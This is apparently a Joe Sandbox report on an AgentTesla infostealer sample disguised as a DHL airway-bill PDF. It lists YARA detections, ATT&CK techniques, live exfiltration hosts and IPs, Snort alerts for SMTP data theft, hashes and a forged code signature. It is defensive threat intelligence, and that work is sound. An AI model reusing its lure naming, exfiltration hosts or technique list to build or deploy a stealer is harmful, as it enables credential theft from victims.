                      Source: Yara matchFile source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f74928.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.AWB DHL#40882993049403.pdf.exe.3f39108.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4515977938.000000000317E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4515977938.0000000003151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AWB DHL#40882993049403.pdf.exe PID: 1984, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5660, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		21
                      Input Capture                      		24
                      System Information Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		1
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		521
                      Security Software Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Software Packing                      		NTDS251
                      Virtualization/Sandbox Evasion                      		Distributed Component Object Model21
                      Input Capture                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets1
                      Application Window Discovery                      		SSH1
                      Clipboard Data                      		12
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      System Network Configuration Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      AWB DHL#40882993049403.pdf.exe21%ReversingLabs
                      AWB DHL#40882993049403.pdf.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://account.dyn.com/0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                      http://ip-api.com0%URL Reputationsafe
                      http://mx-out05.natrohost.com0%Avira URL Cloudsafe
                      http://mail.elektronikkutu.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mx-out05.natrohost.com
                      		94.73.188.44
                      		truetrue
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown
                          mail.elektronikkutu.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://mail.elektronikkutu.comRegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/AWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087795023.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4513620434.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAWB DHL#40882993049403.pdf.exe, 00000000.00000002.2087276155.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0AWB DHL#40882993049403.pdf.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://mx-out05.natrohost.comRegSvcs.exe, 00000003.00000002.4515977938.0000000003184000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://ip-api.comRegSvcs.exe, 00000003.00000002.4515977938.0000000003121000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            		ip-api.comUnited States
                            		53334TUT-ASUStrue
                            94.73.188.44
                            		mx-out05.natrohost.comTurkey
                            		34619CIZGITRtrue

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1466213
                            Start date and time:2024-07-02 17:31:06 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 8m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:AWB DHL#40882993049403.pdf.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/1@2/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 131
                            • Number of non-executed functions: 25
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: AWB DHL#40882993049403.pdf.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            11:32:00API Interceptor12x Sleep call for process: AWB DHL#40882993049403.pdf.exe modified
                            11:32:02API Interceptor11889984x Sleep call for process: RegSvcs.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1llD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            KWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            ServerManager.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            MicrosoftService.exeGet hashmaliciousXWormBrowse
                            • ip-api.com/line/?fields=hosting
                            F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                            • ip-api.com/line/?fields=hosting
                            x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                            • ip-api.com/line/?fields=hosting
                            java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                            • ip-api.com/line/?fields=hosting
                            94.73.188.44PAYMENT SLIP.com.exeGet hashmaliciousAgentTeslaBrowse
                              COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exeGet hashmaliciousAgentTeslaBrowse
                                CTe 002-8-0167948-2.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.10093.13071.exeGet hashmaliciousAgentTeslaBrowse
                                    SHIPMENT NO-369555440.scr.exeGet hashmaliciousAgentTeslaBrowse
                                      SecuriteInfo.com.Trojan.PackedNET.2511.647.11120.exeGet hashmaliciousAgentTeslaBrowse
                                        Payment_Advice-MT103.exeGet hashmaliciousAgentTeslaBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          mx-out05.natrohost.comPAYMENT SLIP.com.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          CTe 002-8-0167948-2.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          SecuriteInfo.com.Win32.PWSX-gen.10093.13071.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          SHIPMENT NO-369555440.scr.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          SecuriteInfo.com.Trojan.PackedNET.2511.647.11120.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          Payment_Advice-MT103.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          ip-api.comllD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          KWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          ServerManager.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          MicrosoftService.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1
                                          x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1
                                          java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          CIZGITRAWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                          • 85.159.66.93
                                          Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 85.159.66.93
                                          Document TOP19928.exeGet hashmaliciousFormBookBrowse
                                          • 85.159.66.93
                                          U prilogu lista novih narudzbi.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                          • 85.159.66.93
                                          PAYMENT SLIP.com.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                                          • 94.73.151.78
                                          fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                                          • 94.73.151.78
                                          tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                                          • 94.73.151.78
                                          COTA#U00c7#U00c3O para fornecedores em branco - termometro digital.exeGet hashmaliciousAgentTeslaBrowse
                                          • 94.73.188.44
                                          wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                          • 85.159.66.93
                                          TUT-ASUSllD1w4ROY5.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                          • 208.95.112.1
                                          DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          KWOTASIE.exeGet hashmaliciousAgentTeslaBrowse
                                          • 208.95.112.1
                                          ServerManager.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          MicrosoftService.exeGet hashmaliciousXWormBrowse
                                          • 208.95.112.1
                                          F.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1
                                          x.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1
                                          java_update.exeGet hashmaliciousAsyncRAT, Neshta, XWormBrowse
                                          • 208.95.112.1

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AWB DHL#40882993049403.pdf.exe.log

                                          Download File
                                          Process:C:\Users\user\Desktop\AWB DHL#40882993049403.pdf.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.334025345208678
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                          MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                          SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                          SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                          SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.1695055566876755
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:AWB DHL#40882993049403.pdf.exe
                                          File size:1'013'256 bytes
                                          MD5:e31da8df37174250f302c4640f97ba15
                                          SHA1:8fad39b3196f439d96fb662161c868de0dc36b9c
                                          SHA256:92dc348193523762bc873e593467abfb04b3509f650976608e6c89436eea993f
                                          SHA512:d9d75d8a6e97823556954a2a64a2a177fd1b7fe14694b60256fd541d0bde37c216e3b7786f64efaffac359734e88a268f18fc820e39ab72835f7b72b2d9cccf8
                                          SSDEEP:24576:bQ8SlsKocVQbsI6uadmVnmI7VH0GkGKCjR8Y:XXKfIkm0I7VHPXjuY
                                          TLSH:9A251AF4FEE55B3AF1E1AEF33788E5DE512EF2B205165A796B0467012220D504CB7B22
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..6...........U... ...`....@.. ....................................@................................

                                          File Icon

                                          Icon Hash:00928e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x4f551e
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xFFBAF889 [Wed Dec 16 21:50:01 2105 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                          Signature Validation Error:The digital signature of the object did not verify
                                          Error Number:-2146869232
                                          Not Before, Not After
                                          • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                          Subject Chain
                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                          Version:3
                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                          Serial:7C1118CBBADC95DA3752C46E47A27438

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xf54c90x4f.text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xf60000x5a4.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xf40000x3608
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf80000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xf2b3c0x70.text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000xf35240xf3600760e43ff73f1abcdf3b5a1902cfd7bf4False0.6791357697740112data7.160837106255626IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xf60000x5a40x600dff63c9db911fafed1a46526db5108d0False0.4303385416666667data4.0956163971257045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0xf80000xc0x2006f0c24164065ef7e2f7538f4a590d484False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0xf60900x314data0.44543147208121825
                                          RT_MANIFEST0xf63b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          07/02/24-17:32:05.987984TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49710587192.168.2.594.73.188.44
                                          07/02/24-17:32:05.987984TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49710587192.168.2.594.73.188.44
                                          07/02/24-17:32:05.988045TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49710587192.168.2.594.73.188.44
                                          07/02/24-17:32:05.988045TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249710587192.168.2.594.73.188.44
                                          07/02/24-17:32:05.988045TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity49710587192.168.2.594.73.188.44
                                          07/02/24-17:32:05.988045TCP2855245ETPRO TROJAN Agent Tesla Exfil via SMTP49710587192.168.2.594.73.188.44

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jul 2, 2024 17:32:02.368626118 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:32:02.373454094 CEST8049708208.95.112.1192.168.2.5
                                          Jul 2, 2024 17:32:02.373519897 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:32:02.377576113 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:32:02.382436037 CEST8049708208.95.112.1192.168.2.5
                                          Jul 2, 2024 17:32:02.853199005 CEST8049708208.95.112.1192.168.2.5
                                          Jul 2, 2024 17:32:02.908859015 CEST4970880192.168.2.5208.95.112.1
                                          Jul 2, 2024 17:32:03.875037909 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:03.880093098 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:03.880183935 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:04.511312962 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:04.511496067 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:04.518132925 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:04.732882977 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:04.733956099 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:04.738878965 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:04.953203917 CEST5874971094.73.188.44192.168.2.5
                                          Jul 2, 2024 17:32:04.953497887 CEST49710587192.168.2.594.73.188.44
                                          Jul 2, 2024 17:32:04.958317041 CEST5874971094.73.188.44192.168.2.5
